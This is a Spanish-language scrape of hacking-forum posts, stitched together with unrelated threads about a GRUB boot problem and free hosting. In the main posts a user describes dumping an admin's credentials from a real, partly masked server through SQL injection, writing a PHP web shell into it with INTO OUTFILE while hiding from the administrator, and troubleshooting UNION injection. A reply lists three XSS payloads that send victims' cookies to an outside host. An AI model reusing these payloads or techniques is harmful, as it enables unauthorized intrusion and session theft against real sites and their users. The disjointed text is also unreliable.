si yo tambien tenia la duda que podia ser eso, el uso de las tags. Ahora veamos, tengo que subir otro archivo .php al servidor ya que INTO OUTFILE no sobreescribe ficheros, por lo que estarian alojados 2 archivos "raros" en ese subdirectorio y no quiero llamar la atencion del admin hasta terminar mis practicas xD.

Pero bueno, me voy a arriesgar a crear otro archivo esperando que el segundo funcione y a traves de la shell intentar borrar el primer archivo.....se puede no?? 

Hay otras formas de redireccionar como estas:

http://xxxxx.xxxxx.xx.cr/DesktopDefault.aspx?mensaje=<script>window.location='http://www.xxx.xxxx.net/archivo.php?cookie='+document.cookie;</script>

http://xxxxx.xxxxx.xx.cr/DesktopDefault.aspx?mensaje=<script>document.location.href='http://www.xxx.xxxx.net/archivo.php?cookie='+document.cookie;</script>

http://xxxxx.xxxxx.xx.cr/DesktopDefault.aspx?mensaje=<script>location.assign('http://www.xxx.xxxx.net/archivo.php?cookie='+document.cookie);</script>

Aca te dejo un tuto bastante bueno y claro por si te interesa: http://4party.cuatrovientos.org/files/xssjavascript.pdf

Gracias ~ Yoya ~, bien explicado el uso de INTO OUTFILE.

Pero ¿A que se debera que no se ejecuta el codigo php?, es decir supongamos que el problema esta en el uso de la funcion system o por el tipo de metodo usado ($_REQUEST). Aun asi el codigo php no se deberia mostrar en el codigo fuente.

Bueno, pues despues de venir testeando SQL Injection con una aplicacion web en X servidor, consegui sacar alguna info, el usuario y contraseña del admin, entre otras cosas.Sin embargo hay algo que no he podido testear y es una shell php, dentro del directorio web encontre un sub directorio donde tengo permiso de escritura, mediante un INTO OUTFILE escribi el codigo de la shell , pero al intentar ejecutarlo no pasa absolutamente nada, y es obvio q no pase nada por que si veo el codigo fuente de archivo se muestra el codigo php, como si php no lo estuviese parseando.¿A que se debe esto?¿Es que acaso no es suficiente con que el archivo este en algun subdirectorio del arbol web?

Buenas a todos.

Por lo que parece en el foro muchos tenemos problemas con el grub....

Hace unos días instale en mi laptop Ubuntu 10.10 netbook edition, durante la instalación no tuve ningún problema (desde USB), pero desde el primer arranque me ha salido la consola del grub, la única forma que he encontrado para que arranque normalmente es ejecutando en dicha consola el comando que es donde tengo instalado Ubuntu, reinicio y arranca bien el grub de Ubuntu, e incluso no ha tenido problemas para reconocer una instalación previa de win 7.

Que es lo que necesito configurar para que me carge directamente el grub de Ubuntu y no la consola?

Desde ya muchas gracias.

Buenas a todos.
Quisiera que me ayudaran a saber que anda mal o que estoy haciendo mal al intentar inyectar la sentencia de union. La situacion es la siguiente,al inyectar el order by N -- al final de la consulta que sera ejecutada en el servidor, pareciese que unicamente se devuelve una columna por que al inyectar 'order by 2--' ya obtengo el unknown column... . es decir todo bien con un 'order by 1--'y se devuelve como parte del error la consulta entera donde se encuentra el error, sin embargo al intentar la union con una sola columna obtengo un error diciendo q el numero de columnas es diferentes, y ademas la consulta que se devuelve con el error no es la misma que devolvia en el error de order by N, en esta consulta se aprecia que se devuelven 10 columnas...intente entonces unirla con 10 columnas, pero sigo obteniendo el mismo error.

Espero que me ayuden a saber el por que de este error...pues en mis pocos años de practica nunca me habia encontrado con un error de este tipo.

No creo que a tu novia le agrade el que andes publicando sus conversaciones en un foro de hacking!!!   

A lo mejor se le olvido la contraseña 

Que tal si elaboras mejor la pregunta, y pues como dice Shell Root
Ademas tambien recorda que un campo con valor NULL no es lo mismo que un campo vacio, ni siquiera un espacio en blanco.

Ese mismo, buen servicio y como extra puedo decir que los subdominios no son tan largos como los de la mayoria de hosting gratuitos, por ejemplo cuando yo me he registrado, me han asignado subdominios tipo  misitio.comuf.com o misitio.comli.com, entre otros.